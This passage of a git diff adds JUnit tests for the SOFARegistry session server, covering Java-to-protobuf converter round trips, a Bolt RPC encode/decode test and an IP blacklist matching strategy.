--- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/SubscriberConverterTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter; + +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.common.model.store.Watcher; +import com.alipay.sofa.registry.core.model.ConfiguratorRegister; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.core.model.SubscriberRegister; +import com.alipay.sofa.registry.server.session.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class SubscriberConverterTest { + @Test + public void testSubscriber() { + SubscriberRegister register = new SubscriberRegister(); + TestUtils.setField(register); + register.setScope(ScopeEnum.dataCenter.name()); + long now1 = System.currentTimeMillis(); + Subscriber subscriber = SubscriberConverter.convert(register); + long now2 = System.currentTimeMillis(); + TestUtils.assertBetween(subscriber.getRegisterTimestamp(), now1, now2); + TestUtils.assertEquals(register, subscriber); + Assert.assertEquals(ScopeEnum.dataCenter, subscriber.getScope()); + } + + @Test + public void testWatcher() { + ConfiguratorRegister register = new ConfiguratorRegister(); + TestUtils.setField(register); + long now1 = System.currentTimeMillis(); + Watcher watcher = SubscriberConverter.convert(register); + long now2 = System.currentTimeMillis(); + TestUtils.assertBetween(watcher.getRegisterTimestamp(), now1, now2); + TestUtils.assertEquals(register, watcher); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/AppRevisionConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/AppRevisionConvertorTest.java new file mode 100644 index 000000000..40f0d26a0 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/AppRevisionConvertorTest.java @@ -0,0 +1,66 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.MetaRegister; +import com.alipay.sofa.registry.common.model.client.pb.MetaService; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; + +public class AppRevisionConvertorTest { + @Test + public void test() { + AppRevision revision = new AppRevision(); + revision.setRevision("testRev"); + revision.setDataCenter("testDc"); + revision.setAppName("testApp"); + AppRevisionInterface inf1 = new AppRevisionInterface(); + inf1.setId("inf1"); + inf1.setServiceParams(Collections.singletonMap("inf11", Lists.newArrayList("1", "2"))); + revision.setInterfaceMap(Collections.singletonMap("svc1", inf1)); + + MetaRegister register = AppRevisionConvertor.convert2Pb(revision); + + Assert.assertEquals(register.getApplication(), revision.getAppName()); + Assert.assertEquals(register.getRevision(), revision.getRevision()); + Assert.assertEquals(register.getBaseParamsCount(), revision.getBaseParams().size()); + Assert.assertEquals(register.getServicesCount(), revision.getInterfaceMap().size()); + MetaService metaService = register.getServicesMap().get("svc1"); + Assert.assertEquals(metaService.getId(), inf1.getId()); + Assert.assertEquals(metaService.getParamsCount(), 1); + Assert.assertEquals( + Sets.newHashSet(metaService.getParamsMap().get("inf11").getValuesList()), + Sets.newHashSet("1", "2")); + + AppRevision appRevision = AppRevisionConvertor.convert2Java(register); + Assert.assertEquals(appRevision.getAppName(), revision.getAppName()); + Assert.assertEquals(appRevision.getRevision(), revision.getRevision()); + Assert.assertEquals(appRevision.getBaseParams().size(), revision.getBaseParams().size()); + Assert.assertEquals(appRevision.getInterfaceMap().size(), revision.getInterfaceMap().size()); + Assert.assertTrue(revision.toString(), revision.toString().contains(revision.getRevision())); + + AppRevisionInterface f1 = appRevision.getInterfaceMap().get("svc1"); + Assert.assertEquals(f1.getId(), inf1.getId()); + Assert.assertEquals(f1.getServiceParams().size(), inf1.getServiceParams().size()); + Assert.assertEquals(f1.getServiceParams(), inf1.getServiceParams()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/BoltEncodeTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/BoltEncodeTest.java new file mode 100644 index 000000000..03765424d --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/BoltEncodeTest.java @@ -0,0 +1,140 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.remoting.CustomSerializerManager; +import com.alipay.remoting.exception.DeserializationException; +import com.alipay.remoting.exception.SerializationException; +import com.alipay.remoting.rpc.protocol.RpcCommandDecoder; +import com.alipay.remoting.rpc.protocol.RpcCommandEncoder; +import com.alipay.remoting.rpc.protocol.RpcRequestCommand; +import com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb; +import com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb; +import com.alipay.sofa.registry.core.model.DataBox; +import com.alipay.sofa.registry.core.model.PublisherRegister; +import com.alipay.sofa.registry.remoting.bolt.serializer.ProtobufCustomSerializer; +import com.alipay.sofa.registry.remoting.bolt.serializer.ProtobufSerializer; +import com.alipay.sofa.registry.server.session.converter.pb.DataBoxConvertor; +import com.alipay.sofa.registry.server.session.converter.pb.PublisherRegisterConvertor; +import io.netty.buffer.ByteBuf; +import io.netty.buffer.ByteBufUtil; +import io.netty.buffer.Unpooled; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author bystander + * @version $Id: BoltEncodeTest.java, v 0.1 2018年03月21日 5:26 PM bystander Exp $ + */ +public class BoltEncodeTest { + + @Test + public void test() { + + CustomSerializerManager.registerCustomSerializer( + PublisherRegisterPb.class.getName(), new ProtobufCustomSerializer()); + + PublisherRegisterPb.Builder builder = PublisherRegisterPb.newBuilder(); + + BaseRegisterPb.Builder baseRegisterBuilder = BaseRegisterPb.newBuilder(); + + Map attributes = new HashMap(); + attributes.put("a", "b"); + baseRegisterBuilder + .setAppName("test") + .setClientId("clientId") + .setDataId("dataId") + .setDataInfoId("DataInfoId") + .setEventType("eventType") + .setGroup("group") + .setInstanceId("InstanceId") + .setIp("ip") + .setPort(1200) + .setProcessId("ProcessId") + .setRegistId("RegistId") + .setVersion(1) + .setTimestamp(1) + .putAllAttributes(attributes); + + builder.setBaseRegister(baseRegisterBuilder.build()); + List dataBoxJavas = new ArrayList(); + final DataBox data = new DataBox(); + data.setData("data"); + dataBoxJavas.add(data); + builder.addAllDataList(DataBoxConvertor.convert2Pbs(dataBoxJavas)); + + final PublisherRegisterPb publisherRegisterPb = builder.build(); + RpcRequestCommand command = new RpcRequestCommand(publisherRegisterPb); + command.setSerializer(ProtobufSerializer.PROTOCOL_PROTOBUF); + command.setTimeout(-1); + command.setRequestClass(publisherRegisterPb.getClass().getName()); + try { + command.serialize(); + } catch (SerializationException e) { + e.printStackTrace(); + } + + for (byte b : command.getContent()) { + System.out.print(String.format("%02x", b)); + } + System.out.println(); + + RpcCommandEncoder protocolEncoder = new RpcCommandEncoder(); + ByteBuf byteBuf = Unpooled.buffer(); + try { + protocolEncoder.encode(null, command, byteBuf); + } catch (Exception e) { + e.printStackTrace(); + } + + StringBuilder sb = new StringBuilder(1024); + ByteBufUtil.appendPrettyHexDump(sb, byteBuf); + + System.out.println(sb); + + RpcCommandDecoder rpcCommandDecoder = new RpcCommandDecoder(); + + final ArrayList out = new ArrayList<>(); + try { + rpcCommandDecoder.decode(null, byteBuf, out); + } catch (Exception e) { + e.printStackTrace(); + } + RpcRequestCommand rpcRequestCommand = null; + for (Object o : out) { + rpcRequestCommand = (RpcRequestCommand) o; + try { + rpcRequestCommand.deserialize(); + } catch (DeserializationException e) { + e.printStackTrace(); + } + } + final PublisherRegisterPb requestObject = + (PublisherRegisterPb) rpcRequestCommand.getRequestObject(); + System.out.println(requestObject); + + Assert.assertEquals(requestObject.getBaseRegister().getAppName(), "test"); + + PublisherRegister publisherRegister = PublisherRegisterConvertor.convert2Java(requestObject); + + System.out.println(publisherRegister); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/PublisherRegisterConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/PublisherRegisterConvertorTest.java new file mode 100644 index 000000000..1033bb51c --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/PublisherRegisterConvertorTest.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb; +import com.alipay.sofa.registry.core.model.DataBox; +import com.alipay.sofa.registry.core.model.PublisherRegister; +import com.alipay.sofa.registry.server.session.TestUtils; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class PublisherRegisterConvertorTest { + @Test + public void test() { + Assert.assertNull(PublisherRegisterConvertor.convert2Pb(null)); + Assert.assertNull(PublisherRegisterConvertor.convert2Java(null)); + PublisherRegister registerJava = new PublisherRegister(); + TestUtils.setField(registerJava); + registerJava.setDataList(Lists.newArrayList(new DataBox("testDataBox"))); + + PublisherRegisterPb pb = PublisherRegisterConvertor.convert2Pb(registerJava); + PublisherRegister convertJava = PublisherRegisterConvertor.convert2Java(pb); + TestUtils.assertEquals(registerJava, convertJava); + Assert.assertEquals(registerJava.toString(), convertJava.toString()); + + Assert.assertEquals(registerJava.getDataList().size(), 1); + Assert.assertEquals(registerJava.getDataList().size(), convertJava.getDataList().size()); + Assert.assertEquals( + registerJava.getDataList().get(0).getData(), convertJava.getDataList().get(0).getData()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/ReceivedDataConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/ReceivedDataConvertorTest.java new file mode 100644 index 000000000..da3d7c672 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/ReceivedDataConvertorTest.java @@ -0,0 +1,96 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb; +import com.alipay.sofa.registry.common.model.client.pb.ReceivedDataPb; +import com.alipay.sofa.registry.core.model.DataBox; +import com.alipay.sofa.registry.core.model.ReceivedConfigData; +import com.alipay.sofa.registry.core.model.ReceivedData; +import java.util.Collections; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class ReceivedDataConvertorTest { + @Test + public void testReceivedData() { + Assert.assertNull(ReceivedDataConvertor.convert2Pb((ReceivedData) null)); + Assert.assertNull(ReceivedDataConvertor.convert2Java(null)); + + ReceivedData registerJava = new ReceivedData(); + registerJava.setScope("testScope"); + registerJava.setDataId("testDataId"); + registerJava.setGroup("testGroup"); + registerJava.setInstanceId("testInstanceId"); + registerJava.setLocalZone("testLocalZone"); + registerJava.setSegment("testSegment"); + registerJava.setVersion(System.currentTimeMillis()); + registerJava.setSubscriberRegistIds(Lists.newArrayList("testRegisterId")); + registerJava.setData( + Collections.singletonMap("testZone", Lists.newArrayList(new DataBox("testDataBox")))); + + ReceivedDataPb pb = ReceivedDataConvertor.convert2Pb(registerJava); + ReceivedData convertJava = ReceivedDataConvertor.convert2Java(pb); + assertReceivedData(registerJava, convertJava); + + Assert.assertTrue( + registerJava.toString(), registerJava.toString().contains(registerJava.getDataId())); + } + + @Test + public void testReceivedConfigData() { + Assert.assertNull(ReceivedDataConvertor.convert2Pb((ReceivedConfigData) null)); + + ReceivedConfigData registerJava = new ReceivedConfigData(); + registerJava.setDataId("testDataId"); + registerJava.setGroup("testGroup"); + registerJava.setInstanceId("testInstanceId"); + registerJava.setVersion(System.currentTimeMillis()); + registerJava.setConfiguratorRegistIds(Lists.newArrayList("testRegisterId")); + registerJava.setDataBox(new DataBox("testDataBox")); + + ReceivedConfigDataPb pb = ReceivedDataConvertor.convert2Pb(registerJava); + + Assert.assertEquals(pb.getDataId(), registerJava.getDataId()); + Assert.assertEquals(pb.getGroup(), registerJava.getGroup()); + Assert.assertEquals(pb.getInstanceId(), registerJava.getInstanceId()); + Assert.assertEquals(pb.getVersion(), registerJava.getVersion().longValue()); + Assert.assertEquals(pb.getDataBox().getData(), registerJava.getDataBox().getData()); + Assert.assertEquals(pb.getConfiguratorRegistIdsList(), registerJava.getConfiguratorRegistIds()); + + Assert.assertTrue( + registerJava.toString(), registerJava.toString().contains(registerJava.getDataId())); + } + + private void assertReceivedData(ReceivedData left, ReceivedData right) { + Assert.assertEquals(left.getScope(), right.getScope()); + Assert.assertEquals(left.getDataId(), right.getDataId()); + Assert.assertEquals(left.getGroup(), right.getGroup()); + Assert.assertEquals(left.getInstanceId(), right.getInstanceId()); + Assert.assertEquals(left.getLocalZone(), right.getLocalZone()); + Assert.assertEquals(left.getSegment(), right.getSegment()); + Assert.assertEquals(left.getVersion(), right.getVersion()); + Assert.assertEquals(left.getSubscriberRegistIds(), right.getSubscriberRegistIds()); + Assert.assertEquals(left.getData().keySet(), right.getData().keySet()); + Assert.assertEquals(left.getData().values().size(), right.getData().values().size()); + Assert.assertEquals(left.getData().values().size(), 1); + Assert.assertEquals( + left.getData().values().iterator().next().get(0).getData(), + right.getData().values().iterator().next().get(0).getData()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/RegisterResponseConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/RegisterResponseConvertorTest.java new file mode 100644 index 000000000..76703f29b --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/RegisterResponseConvertorTest.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.RegisterResponsePb; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import org.junit.Assert; +import org.junit.Test; + +public class RegisterResponseConvertorTest { + @Test + public void test() { + Assert.assertNull(RegisterResponseConvertor.convert2Pb(null)); + Assert.assertNull(RegisterResponseConvertor.convert2Java(null)); + RegisterResponse registerJava = new RegisterResponse(); + + registerJava.setVersion(100); + registerJava.setRegistId("testRegisterId"); + registerJava.setMessage("testMsg"); + registerJava.setSuccess(true); + registerJava.setRefused(true); + + RegisterResponsePb pb = RegisterResponseConvertor.convert2Pb(registerJava); + RegisterResponse convertJava = RegisterResponseConvertor.convert2Java(pb); + + Assert.assertEquals(registerJava.getVersion(), convertJava.getVersion()); + Assert.assertEquals(registerJava.getMessage(), convertJava.getMessage()); + Assert.assertEquals(registerJava.isSuccess(), convertJava.isSuccess()); + Assert.assertEquals(registerJava.getRegistId(), convertJava.getRegistId()); + Assert.assertEquals(registerJava.isRefused(), convertJava.isRefused()); + + Assert.assertEquals(registerJava.toString(), convertJava.toString()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SubscriberRegisterConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SubscriberRegisterConvertorTest.java new file mode 100644 index 000000000..ce07c0cf4 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SubscriberRegisterConvertorTest.java @@ -0,0 +1,39 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb; +import com.alipay.sofa.registry.core.model.SubscriberRegister; +import com.alipay.sofa.registry.server.session.TestUtils; +import org.junit.Assert; +import org.junit.Test; + +public class SubscriberRegisterConvertorTest { + @Test + public void test() { + Assert.assertNull(SubscriberRegisterConvertor.convert2Pb(null)); + Assert.assertNull(SubscriberRegisterConvertor.convert2Java(null)); + SubscriberRegister registerJava = new SubscriberRegister(); + TestUtils.setField(registerJava); + registerJava.setScope("testScope"); + SubscriberRegisterPb pb = SubscriberRegisterConvertor.convert2Pb(registerJava); + SubscriberRegister convertJava = SubscriberRegisterConvertor.convert2Java(pb); + TestUtils.assertEquals(registerJava, convertJava); + Assert.assertEquals(registerJava.getScope(), convertJava.getScope()); + Assert.assertEquals(registerJava.toString(), convertJava.toString()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigRequestConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigRequestConvertorTest.java new file mode 100644 index 000000000..41c155ce6 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigRequestConvertorTest.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb; +import com.alipay.sofa.registry.core.model.SyncConfigRequest; +import org.junit.Assert; +import org.junit.Test; + +public class SyncConfigRequestConvertorTest { + @Test + public void test() { + Assert.assertNull(SyncConfigRequestConvertor.convert2Pb(null)); + Assert.assertNull(SyncConfigRequestConvertor.convert2Java(null)); + SyncConfigRequest registerJava = new SyncConfigRequest(); + + registerJava.setDataCenter("testDataCenter"); + registerJava.setZone("testZone"); + + SyncConfigRequestPb pb = SyncConfigRequestConvertor.convert2Pb(registerJava); + SyncConfigRequest convertJava = SyncConfigRequestConvertor.convert2Java(pb); + + Assert.assertEquals(registerJava.getDataCenter(), convertJava.getDataCenter()); + Assert.assertEquals(registerJava.getZone(), convertJava.getZone()); + Assert.assertEquals(registerJava.toString(), convertJava.toString()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigResponseConvertorTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigResponseConvertorTest.java new file mode 100644 index 000000000..c2b57bf31 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigResponseConvertorTest.java @@ -0,0 +1,47 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb; +import com.alipay.sofa.registry.core.model.SyncConfigResponse; +import com.google.common.collect.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class SyncConfigResponseConvertorTest { + @Test + public void test() { + Assert.assertNull(SyncConfigResponseConvertor.convert2Pb(null)); + Assert.assertNull(SyncConfigResponseConvertor.convert2Java(null)); + SyncConfigResponse registerJava = new SyncConfigResponse(); + + registerJava.setRetryInterval(100); + registerJava.setAvailableSegments(Lists.newArrayList("testSeg")); + registerJava.setMessage("testMsg"); + registerJava.setSuccess(true); + + SyncConfigResponsePb pb = SyncConfigResponseConvertor.convert2Pb(registerJava); + SyncConfigResponse convertJava = SyncConfigResponseConvertor.convert2Java(pb); + + Assert.assertEquals(registerJava.getRetryInterval(), convertJava.getRetryInterval()); + Assert.assertEquals(registerJava.getMessage(), convertJava.getMessage()); + Assert.assertEquals(registerJava.isSuccess(), convertJava.isSuccess()); + Assert.assertEquals(registerJava.getAvailableSegments(), convertJava.getAvailableSegments()); + + Assert.assertEquals(registerJava.toString(), convertJava.toString()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultDataIdMatchStrategyTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultDataIdMatchStrategyTest.java new file mode 100644 index 000000000..0ea2f7ea5 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultDataIdMatchStrategyTest.java @@ -0,0 +1,19 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +public class DefaultDataIdMatchStrategyTest {} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultIPMatchStrategyTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultIPMatchStrategyTest.java new file mode 100644 index 000000000..1cd47181a --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultIPMatchStrategyTest.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import java.util.Collections; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.internal.util.collections.Sets; + +public class DefaultIPMatchStrategyTest { + @Test + public void test() { + DefaultIPMatchStrategy strategy = new DefaultIPMatchStrategy(); + BlacklistManagerImpl mgr = new BlacklistManagerImpl(); + strategy.blacklistManager = mgr; + mgr.blacklistConfigList = Lists.newArrayList(); + mgr.blacklistConfigList.add( + getIpConfig(BlacklistConstants.FORBIDDEN_PUB + "1", Collections.emptyList())); + + Assert.assertFalse(strategy.match("192.168.1.1", () -> BlacklistConstants.FORBIDDEN_PUB)); + + mgr.blacklistConfigList.add( + getIpConfig(BlacklistConstants.FORBIDDEN_PUB, Collections.emptyList())); + Assert.assertFalse(strategy.match("192.168.1.1", () -> BlacklistConstants.FORBIDDEN_PUB)); + + List types = Lists.newArrayList(); + MatchType m = new MatchType(); + m.setType(BlacklistConstants.IP_FULL); + types.add(m); + mgr.blacklistConfigList.add(getIpConfig(BlacklistConstants.FORBIDDEN_PUB, types)); + Assert.assertFalse(strategy.match("192.168.1.1", () -> BlacklistConstants.FORBIDDEN_PUB)); + + m.setPatternSet(Sets.newSet("192.168.1.2")); + Assert.assertFalse(strategy.match("192.168.1.1", () -> BlacklistConstants.FORBIDDEN_PUB)); + + m.setPatternSet(Sets.newSet("192.168.1.2", "192.168.1.1")); + Assert.assertTrue(m.toString(), m.toString().contains("192.168.1.1")); + Assert.assertTrue( + mgr.blacklistConfigList.toString(), + mgr.blacklistConfigList.toString().contains("192.168.1.1")); + + Assert.assertTrue(strategy.match("192.168.1.1", () -> BlacklistConstants.FORBIDDEN_PUB)); + } + + private BlacklistConfig getIpConfig(String type, List matchTypes) { + BlacklistConfig cfg = new BlacklistConfig(); + cfg.setType(type); + Assert.assertEquals(cfg.getType(), type); + cfg.setMatchTypes(matchTypes); + List got = cfg.getMatchTypes(); + Assert.assertEquals(matchTypes.size(), got.size()); + for (int i = 0; i < got.size(); i++) { + MatchType left = got.get(i); + MatchType right = matchTypes.get(i); + Assert.assertEquals(left.getType(), right.getType()); + Assert.assertEquals(left.getPatternSet(), right.getPatternSet()); + Assert.assertEquals(left.toString(), right.toString()); + } + return cfg; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListenerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListenerTest.java new file mode 100644 index 000000000..048b44c21 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/listener/ProvideDataChangeFetchTaskListenerTest.java @@ -0,0 +1,47 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.listener; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.node.processor.MetaNodeSingleTaskProcessor; +import com.alipay.sofa.registry.task.batcher.TaskDispatchers; +import com.alipay.sofa.registry.task.listener.TaskEvent; +import org.junit.Assert; +import org.junit.Test; + +public class 